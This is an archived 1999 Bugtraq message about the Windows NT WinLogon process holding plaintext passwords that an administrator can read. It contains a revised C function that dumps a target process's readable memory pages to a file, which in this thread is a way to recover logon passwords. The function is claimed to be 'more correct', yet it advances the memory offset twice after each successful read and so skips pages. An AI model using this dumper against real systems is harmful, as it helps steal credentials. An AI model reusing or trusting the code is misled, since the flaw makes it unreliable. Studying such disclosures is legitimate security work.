Actually there is a large bug in the code (well - it works just as well but thousands of times faster and is more correct): There is no reason to look beyond the application min and max address range and no reason to read in anything other then page sizes (since a VirtualAlloc will always round to at least the next largest page size). This was how I should have written it to begin with but I got lazy :) DWORD DumpMemory(HANDLE hProc, LPSTR szPath) { LPSTR lpOffset = 0; LPSTR lpBuf = 0; DWORD dwRead = 0; BOOL bLastRead = FALSE; DWORD dwDumpedBytes = 0; SYSTEM_INFO si = {0}; FILE *f = 0; f = fopen(szPath, "wb"); if(f) { GetSystemInfo(&si); lpBuf = (LPSTR)malloc(si.dwPageSize + 1); for(lpOffset = si.lpMinimumApplicationAddress; (void*)lpOffset <= si.lpMaximumApplicationAddress; lpOffset += si.dwPageSize) { if(ReadProcessMemory( hProc, lpOffset, lpBuf, si.dwPageSize, &dwRead)) { if(bLastRead) { fwrite(lpBuf, 1, dwRead, f); } else { fprintf(f, "\noffset %lx\n", lpOffset); fwrite(lpBuf, 1, dwRead, f); bLastRead = TRUE; } dwDumpedBytes += dwRead; lpOffset += si.dwPageSize; } else { bLastRead = FALSE; } } fclose(f); } else { fprintf(stderr, "Unable to open %s", szPath); } return dwDumpedBytes; } -----Original Message----- From: Jorge_Miguel_Pintoat_private [mailto:Jorge_Miguel_Pintoat_private] Sent: Thursday, December 16, 1999 9:48 AM To: rhorvickat_private Cc: BUGTRAQat_private Subject: RE: NT WinLogon VM contains plaintext password visible in admin m ode I am sorry, but only read this today... There is small bug in this code... <! LPSTR lpOffset = (void*)1; !> LPSTR lpOffset = (LPSTR)1; This also doesn't work on Windows 2000 Professional, SRV and Adv Srv. Greetings, J.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:21:50 PDT